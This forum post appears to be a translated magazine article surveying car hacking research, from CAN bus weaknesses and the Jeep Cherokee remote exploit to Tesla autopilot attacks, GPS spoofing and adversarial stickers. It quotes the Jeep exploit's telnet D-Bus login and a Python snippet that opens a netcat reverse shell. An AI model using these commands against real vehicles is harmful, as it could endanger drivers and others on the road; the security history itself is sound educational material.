"Hold on tight to the steering wheel!" Who cheats smart cars and how

Hacker

Professional
Messages
1,043
Reaction score
844
Points
113
The content of the article
  • Architecture: CAN bus, ECUs, etc.
  • Scientists join the battle
  • Reason to think
  • Chris Valasek and Charlie Miller - legendary duo
  • A sad story about a jeep and an audio system
  • A gift of fate: a careless provider with a leaky network
  • Applied philosophy: safety in development and safety in use
  • Who rules Tesla?
  • Dangerous life hack
  • Sensors: how robots see the world
  • GPS: hello, where am I?
  • The Chinese room: what the autopilot is thinking
  • The neural network does not like noise
  • Human, all too human: the limitations of technology
  • Autonomy levels
  • How to stop worrying and love a smart car

Architecture: CAN bus, ECUs, etc.
Let's start with architecture. The on-board computer of a modern car does not really exist as a whole. Instead, we have a collection of electronic control units (ECUs) connected to a network. From the late 1980s to the present day, the so-called CAN bus remains the basic standard of this network. That is, pieces of twisted pair, to which all ECUs transmit messages of the same format.

In fact, of course, everything is a little more complicated. The bus can be not one, but several - for example, for more important devices with increased speed and for secondary ones. In this case, there is some kind of "bridge" between the tires. And in its MEB platform for electric vehicles, Volkswagen is completely abandoning the CAN-bus architecture and will use onboard Ethernet instead - and a unified Android-based operating system.

WWW
For more information about the data exchange format for CAN-bus device can be read in our recent article, in our March issue in 2015 or in Wikipedia. And if you really want to study the issue in detail, then there is a good book from a great specialist in the public domain .

For the time being, it is important for us that, no matter how “smart” a modern car is, the same tire is at the heart of it. This means that its fundamentally unrecoverable vulnerability is still relevant: by gaining access to CAN (for example, by connecting to a diagnostic connector or placing a sniffer on the bus), we gain access to all transmitted information. With all the ensuing consequences.

And if we can transmit our signal to any of the ECUs, then it will obediently execute the command. If it is an air conditioner control unit, it's not so bad yet. And if the brake or engine control unit? In accordance with the principle of "breaking, not building" (or Garbage in, garbage out - "garbage at the entrance, garbage at the exit"), a single wrong command, received at the time of intense overtaking with a departure into the oncoming lane, can lead to sad consequences and loud newspaper headlines.

However, things are not so bad. Manufacturers are not stupid and are quite capable of building protection elements into each specific ECU. He may refuse to accept the command if it does not have the correct checksum or if it does not meet some additional conditions. Very often, you can pretend to be a parking assistant only if the car is going in reverse and no faster than five kilometers per hour - otherwise, its signals will be ignored.

In addition, messages on the CAN bus are commands so low-level that they can be compared to machine code. To understand what the bit sequence means, you will have to read the manufacturer's technical instructions for a long time or carry out full-scale experiments on a real car - or, in a fishless state, on separate ECUs.

Scientists join the battle
It turns out to be an interesting situation: on a theoretical level, hacking a car is very simple, but on a practical level, it will take a lot of meticulous preparation. And somehow it turned out that for a long time this was mainly done by people who stay in the shadows and have purely selfish interests - not to gain control over the electronics of a car, but to get the car itself into their own hands.

It was only in 2010 that they started talking seriously about this topic. The Institute of Electrical and Electronics Engineers (IEEE) Safety Symposium featured a presentation by computer engineers from the Universities of San Diego and Washington.

They described many extremely interesting features of automobiles as computer systems. Basically, these features stemmed from the fact that the industry pays much attention to safety during normal use and emergencies, but little protection from a targeted attack on the electronic systems of the car.

For example, so that in an accident the car doors would not be locked, the low-priority network, where the central locking control unit was connected, had a "bridge" connection with the high-priority network, in which there were state sensors for the entire car and blocks of various systems - "assistants" to the driver. And advanced telematic systems collected the readings of many sensors and sent them to service centers via cellular communication - so that the car could tell the owner in advance that it would soon be time to look at the car service, or independently called 911 in case of an accident. Moreover, an anti-theft device could be included in the same system - allowing to block the engine of the car from a distance.

What exactly did this team of researchers do? To begin with, they wrote the CARSHARK program, a flexible tool for analyzing and embedding messages on the CAN bus. Further, great opportunities open up. Without going too deeply into the technical details, let's just say that those ECUs in which authentication was built were protected with only a 16-bit key. Such protection can be bypassed by brute-force in a few days. After that, you can, for example, "reflash" the ECU - and then do whatever you want.

Significant harm can be done simply by arranging a classic DoS attack: a system overloaded with meaningless messages becomes inoperative. But it was also possible to play the hero of films about hackers. For example, as a simple and convincing demonstration of their strength, the researchers wrote a "self-destruct demo virus": after it was started, the car displayed a countdown from sixty on the speedometer, blinked with turn signals and beep in time with the passing seconds, and then firmly turned off the engine and locked the locks, leaving on the speedometer PWNED inscription.

An even more insidious approach that the researchers demonstrated was loading malicious code into the RAM of a telematics system (inside which there was a full-fledged Unix-based OS). They made it so that the code fires on a trigger (for example, overclocking to a certain speed) and reboots the system after firing, removing itself from there. Ideal crime!

But the researchers didn't stop there. The next year, in 2011, they presented a new report (PDF), in which they considered not what an attacker can do with the system, having gained access to it, but how exactly he can get this access.

Reason to think
In 2011, researchers noted as already a real vector of attack computers to which cars are connected in car services - they use Windows and often need access to the Internet ... And as a theoretical, possible in the future - equipped at charging stations for electric vehicles " smart "chargers, which carry not only high current, but also information.

Unlike their previous highly specific lecture, this one reads more like a gripping narrative of the heights and failures of engineering. What is just a music track in WMA format, which is played on a computer like ordinary music, but on a car player sends malicious packets to the CAN bus. Or speculations about how exactly you can connect to a car via Bluetooth or via a telematics system with a cellular connection.

In other words, in this report, researchers were more likely to point to potential threats that resemble scripts for hacker movies - with the caveat that they really did all this in a laboratory setting, and not just assumed that such things could happen.

Chris Valasek and Charlie Miller - legendary duo
Well, after a team of researchers from two major universities did this, two guys in their garage were able to repeat their achievements - meet Chris Valasek and Charlie Miller.

They began by meticulously repeating the research of their predecessors - and wrote a much more detailed and complete report. The conclusions described in it have already been mentioned several times in this article: for a successful hacking into a car, a lot of painstaking preliminary work is required, which has its pitfalls - for example, if you examine ECUs separately from the car, on a special test bench, then they can ( and will!) behave not quite the same as in working conditions. But if you are not afraid of all this work, then when you get access to the car, it will be clear what to do - and a lot can be done.

They then looked at a couple of dozen specific car models, looking at the details of their network architecture - and especially the possible vectors of a remote attack. It was at this stage that they identified the so-called cyber-physical components - all kinds of driver assistants like cruise control or LKA (Lane Keep Assist). These devices simultaneously serve as the hacker's most compelling end goal - and important milestones on the road to a truly self-driving car.

Valasek and Miller found that, on the one hand, car manufacturers use different components and network architectures, but on the other hand, many entertainment systems use well-known solutions from common consumer electronics all the way to web browsers.

A sad story about a jeep and an audio system
But the main result of this stage of their labors was the appointment of a goal for the next step. They found a potentially interesting vulnerability in the 2014 Jeep Cherokee - and decided to tackle it seriously.

And their efforts were rewarded. The Jeep's dashboard was built with the Harman Uconnect entertainment system, a computer with a 32-bit ARM architecture processor and the QNX operating system (a Unix-like commercial microkernel OS often used in such embedded systems). She combined an audio system, a radio station, a navigator, applications - and also knew how to distribute Wi-Fi and had a 3G modem.

A scan of the open ports of this access point showed that this included port 6667. And that this port was used by the D-Bus interprocess communication system. And that to access it on this port, you didn't even need a password.
Code:
telnet 192.168.5.1 6667
Trying 192.168.5.1...
Connected to 192.168.5.1.
Escape character is '^]'.
AUTH ANONYMOUS
OK 4943a53752f52f82a9ea4e6e00000001
BEGIN

After that, one could simply run a short Python script to open a remote "root" access shell.
Code:
import dbus
bus_obj=dbus.bus.BusConnection("tcp:host=192.168.5.1,port=6667")
proxy_object=bus_obj.get_object('com.harman.service.NavTrailService','/com/harman/service/NavTrailService')
playerengine_iface=dbus.Interface(proxy_object,dbus_interface='com.harman.ServiceIpc')
print playerengine_iface.Invoke('execute','{"cmd":"netcat -l -p 6666 | /bin/sh | netcat 192.168.5.109 6666"}')

And, according to the hackers themselves, "further on this thing you can run any code you want."

A gift of fate: a careless provider with a leaky network
But the amazing discoveries do not end there. Port 6667 was available for any network interface, including a 3G modem. The hackers bought several femtocells on eBay - miniature access points for the Sprint Airave 2.0 network, knowing that these devices had an exploit that would allow them to connect to them via Telnet. And yes, when the car got within range of their point, the hackers were able to connect to the car. But that was not all! It turned out that any two devices connected to the Sprint network can communicate with each other within the United States.

By this point, the hackers had already established a list of IP addresses that were allocated for cars on this network. It was enough to scan this range - any address on the network with port 6667 open was access to the D-Bus interface of some car in the United States. Not necessarily Cherokee. The researchers found several models with a port open for access without authentication - and in this place of their work they repeat several times that they did not implement anything in any of the vehicles found, but simply discovered a vulnerability.

They were unable to establish exactly how many machines they could have hacked if they had the desire - and assumed that a couple of hundred thousand. But when their study (PDF) was published, Chrysler recalled 1.5 million vehicles for safety reasons.

Applied philosophy: safety in development and safety in use
Chris Valasek and Charlie Miller worked long and hard and finally got their way - their Cherokee hack really became a sensation, after which car manufacturers finally began to listen to security experts.

The hackers managed to convince the industry representatives that the same security principles are important for computerized cars as for the rest of electronics: design with an emphasis on the best practices of infosec, working closely with expert hackers and, most importantly, understanding that “ holes ”should not be hushed up, but promptly fixed with patches, preferably centrally distributed and requiring a minimum of effort from the user.

For example, some lazy and incurious jeep driver may well have missed a warning about a problem, failed to reach a service center, and left his car vulnerable. But the owner of Tesla is already receiving security updates on his car, just like on his phone or computer.

In addition, the duo of hackers separately noted an alarming trend - the more “cyber-physical components” in a modern car, the “smarter” they become, the more control over the behavior of the car could be given to a separate ECU. Such a block turns out to be a high-priority and critical target at the same time. After penetrating the on-board network of the car, you can no longer puzzle over how different ECUs work together, but focus on the one that most resembles the "autopilot", and in one way or another deceive it specifically.

And if a car is getting smarter, if it has long been able to park on its own, maintain speed and lane while driving on the motorway, prepare for braking when the car in front of it begins to close the distance, then at what point does it become self-driving? And how much can you trust him?

This is not only a technical but also a philosophical question. Practice shows that modern automakers are simultaneously praising the new functions of their products and strongly recommend that drivers not take their hands off the steering wheel and keep their eyes on the road in order to maintain the ability to personally intervene in an unforeseen situation. Alas, in the same way, practice shows that drivers often ignore this reasonable advice.

Who rules Tesla?
Whenever a fancy Tesla gets into an accident, everyone talks loudly about its autopilot or batteries, but pays much less attention to what the driver was doing before the accident. In a few real-life cases, the answer was "eating bagels", "watching a movie" or simply "holding the steering wheel tightly for no more than a couple of minutes in an hour's drive." The unfortunate story repeats over and over again: when driving in the leftmost lane, the driver in front of the Tesla sees some obstacle, goes to the right lane ... and Tesla starts to accelerate, thinking that they are giving way. The end is a little predictable. In August of this year, such an incident took place in Moscow.

And this happens due to the peculiarities of the device and the settings of the Tesla sensors. It does not use a lidar (laser locator) and a pre-loaded map of the area - Elon Musk believes that the former is too expensive, and the latter does not give the desired flexibility.

Tesla instead relies on radar and camera readings from which the neural network processes the data. But the radar is not very good at detecting stationary objects, and when it and the cameras give opposite results, the mechanism for resolving the contradictions sometimes chooses the wrong one. And the driver is not ready to intervene quickly and save the situation.

Dangerous life hack
Some experts argue that the point is not only in technical nuances, but also in the fact that Elon Musk advertises his brainchild as a full-fledged autopilot. The instructions for Tesla say that the driver must always be ready to take the wheel, but in the commercials Musk himself clearly violates this rule and thereby sets a bad and dangerous example for the drivers.

Sensors: how robots see the world
The example above clearly shows that the degree of "smartness" of a machine depends, firstly, on the number and quality of sensors installed on it, and secondly, on the device of the system that processes signals from them. But each sensor is also a data input channel, and it may have its own vulnerabilities.

Here again, the same problem arises: Development focuses primarily on complex daily use cases, rather than on countering targeted interference and attacks. And very often algorithms for resolving conflicts of conflicting signals are simply not designed to be deceived. Everything is like in good old science fiction - robots are smart, but gullible.

Back in 2013, hacker Zoz Brooks gave a talk (PDF) at DEF CON 21, in which he examined in great detail the prospects for attacks on autonomous vehicles - including self-driving cars, drones and even robotic submarines.

He examined different types of sensors and control channels for such devices, dwelling in detail on the strengths and weaknesses of each, and indicated two common attack paths for all types of sensors: jamming and signal distortion (spoofing).

The report is full of extremely interesting details. It mentions a security manual written in Arabic (probably the materials of some group prohibited by the legislation of the Russian Federation), in which it is advised to deceive lidars with the help of reflectors. The possibility is mentioned to deceive the wheel revolution counter ... by replacing the wheels - if the wheel size is different from the specified one, the counter will lie. Weaknesses of solutions using maps, both preloaded and updated in real time, are considered.

GPS: hello, where am I?
Brooks' talk also talks a lot about GPS signal distortion. At that time, it was still a little-studied, but already hot topic - after all, presumably it was with the use of GPS deception that the Iranian cyber troops managed to capture the secret US stealth drone RQ-170 Sentinel.

This technology is used everywhere these days . In 2017, twenty ships in the Black Sea near Gelendzhik observed a GPS deviation of more than 25 nautical miles. In the same way, the strange readings of navigators are sometimes noted by drivers when a cortege of dignitaries sweeps by nearby. However, due to the rapid reduction in the cost of SDR technologies (Software Defined Radio, computer-controlled radio receiver and radio transmitter), such opportunities have become available to individuals.

Just recently, technology company Regulus, which deals with satellite navigation solutions to protect against spoofing, showed that a couple of devices and a budget of $ 600 are enough to make the Tesla Model 3 go not where the driver wants to go. A false signal makes the autopilot think that it is on a route and it is time to turn off the highway - which brings the car to the side of the road or into the oncoming lane. However, any devices with GPS are vulnerable to such attacks - drones, inattentive drivers who trust navigators, and even the Pokemon GO game.

The Chinese room: what the autopilot is thinking
But this is all about sensors. Ultimately, everything is clear with them - there is no reception against scrap, in foggy or dusty weather, cameras and lidar are less visible, and they can also be simply sealed with tape or substituted under the "light" with a special emitter, as researchers from the Qihoo 360 laboratory did. And what about the part of the smart car that uses their readings? Can you cheat her?

Chinese hackers from the Keen Security Lab, sponsored by the mega-corporation Tencent, answer this question in more detail . Apparently, they very carefully studied all the above works and in 2016 decided to try their hand at this area. But unlike Charlie Miller and Chris Velasek, who were interested in different makes and models of cars, this group from the beginning focused exclusively on the study of Tesla electric vehicles.

Their reports are very dry and full of technical details, but if you read it carefully, it becomes clear that the most interesting in their research is not the external manifestations of "hacking", but the volume and quality of the work done (as well as a strong sense of déjà vu - many of the vulnerabilities that they enjoyed, bring to mind the works of Charlie Miller and Chris Valasek and wonder that these recipes are still relevant).

The members of the Keen Security Lab team turned out to be true masters of reverse engineering. They have come a long way to show off Tesla's trunk that opens at their command or fold down its mirrors in 2016 - the use of a “dummy” Wi-Fi hotspot and vulnerabilities in the web browser of the on-board entertainment system were just the beginning.

The most important thing is that, having penetrated through this "hole" into the system, they eventually reprogrammed a special Gateway component (a bridge between different parts of the on-board network) and thus gained access to the CAN bus. After that, they dug into various cyber-physical components of the machine - and in 2018 they released a new report on how they managed to get "root" access to the autopilot (along the way, bypassing the protection improved after their last report). And after that, they were able to carefully study its structure - this was their most recent report in 2019 (PDF).

Due to the "root" access, they managed to work with the autopilot in debug mode, to investigate exactly how it processes data from cameras and other sensors. In particular, they found that several tasks at once: tracking objects, building a map of the situation, and even detecting rain - at the final stage are processed by a single neural network.

The neural network does not like noise
What the researchers at Keen Security Lab did next looks pretty boring (the car turns on the windshield wipers when it's not raining), but at its core it is something on the verge of art and science fiction. To better understand how the autopilot works in general, they trained on the part of the neural network that recognizes if it is raining and gives the command to turn on the wipers. And we achieved results!

After examining the images that the wipers neural network uses, they applied the "hostile patterns" method to it. Above the photographs from the camera, interference was imposed, which look insignificant to the human eye. By feeding this photo to the neural network, the researchers were able to trick the neural network into thinking that the probability of rain was high and turning on the wipers. And this is all - not with a neural network, which they programmed themselves, but with a commercial product, in the development of which they did not participate.

After that, Keen Security employees ensured that for the effect to be triggered, it was enough to impose noises on only a part of the camera's field of view. And then they transferred this effect to the real world. By showing a picture with noise on a TV screen in the field of view of car cameras, they forced the wipers to turn on. After that, they tested the same principles already on the task of recognizing road markings.

It turned out that stickers on the road can confuse the autopilot and it will not notice the marking line, but these stickers will be visible to the naked eye (the researchers note that the autopilot neural network has been trained, among other things, on examples with half-erased or partially covered markings). Then the researchers tried the opposite problem - with the help of other, much smaller stickers, they were able to make the neural network see the marking lines where there were none. For example, at an intersection where such non-existent markings can lead a car into oncoming traffic. Researchers argue that although they figured it all out on a car to which they had unlimited access, the tricks themselves should work for a car, the program of which does not exist. did not change.

Human, all too human: the limitations of technology
In principle, all of the above is already enough for some conclusions. But for the sake of completeness, I would like to mention a few more things.

Note that the largest players in the self-driving car market are sticking to map-based solutions and testing their products in specific cities (or even at proving grounds). This is because it makes it much easier for the autopilot to think: maps can include the location of road signs, and places of high importance, and of course - the terrain, known obstacles and just a traffic pattern. It is not for nothing that the Yandex division is working on the Russian analogue of Google's Waymo - a huge array of maps and panoramas will be of great help here. And orienteering in a completely unfamiliar area is still the lot of DARPA winners and ambitious startups.

Remember, too, that with the exception of individual advertising samples, many self-driving cars always have an insurance driver behind the wheel. And manufacturers are in no hurry to disclose statistics on cases when his intervention becomes necessary. Because it happens more often than they would like.

Autonomy levels
The American Society of Automotive Engineers (SAE) defines the degree of autonomy of a vehicle on a scale of 0 to 5. On this scale, Tesla is rated as representative of level 2 - the automation controls speed and direction, but the driver must be ready to intervene at any moment. By the way, the usual parking assistant also falls into this category.
The next, third level implies full control of the automation of the vehicle - but only in severely limited conditions, for example, on a high-speed highway, where there are no intersections.
Level 4 does not theoretically require the presence of a person behind the wheel - but also only under strictly defined conditions, such as movement within a predetermined area. Waymo cars are at this level.
The fifth level - when a person finally turns into a passenger, and a car is capable of moving in unlimited conditions - is not yet achievable for any of the projects.

How to stop worrying and love a smart car
So what is the end result? Yes, the same as with many other representatives of the "Internet of things". The higher the complexity of the system, the more potential vulnerabilities it has, and the most protected elements can be bypassed by attacking the more vulnerable ones. Borrowing ready-made solutions from related areas of electronics, designers forget that there may be their own problems. And finally, the human factor - vigilance is dulled when the system repeatedly copes with simple tasks, and no one is ready for its error in a difficult situation.

Be vigilant and careful - while driving and on the Internet. Do not scold robots in vain - they are still learning - but also do not trust them in critical and vital matters one hundred percent.

And if, after reading this article, you do not want to move into the old Zhiguli without all this electronics, but, on the contrary, figure it out on your own experience, you can try to pay attention to George Hotz's project comma.ai. It is a fully open source car autopilot with relatively cheap electronics that can be easily installed in many modern cars. It will be released much cheaper than Tesla and much more interesting - at your service is an extensive community of enthusiasts, your own wiki and a detailed and interesting blog of developers. And you don't even have to keep your hands on the steering wheel.

But looking at the road ahead and thinking about what you are doing is still necessary.
 
Top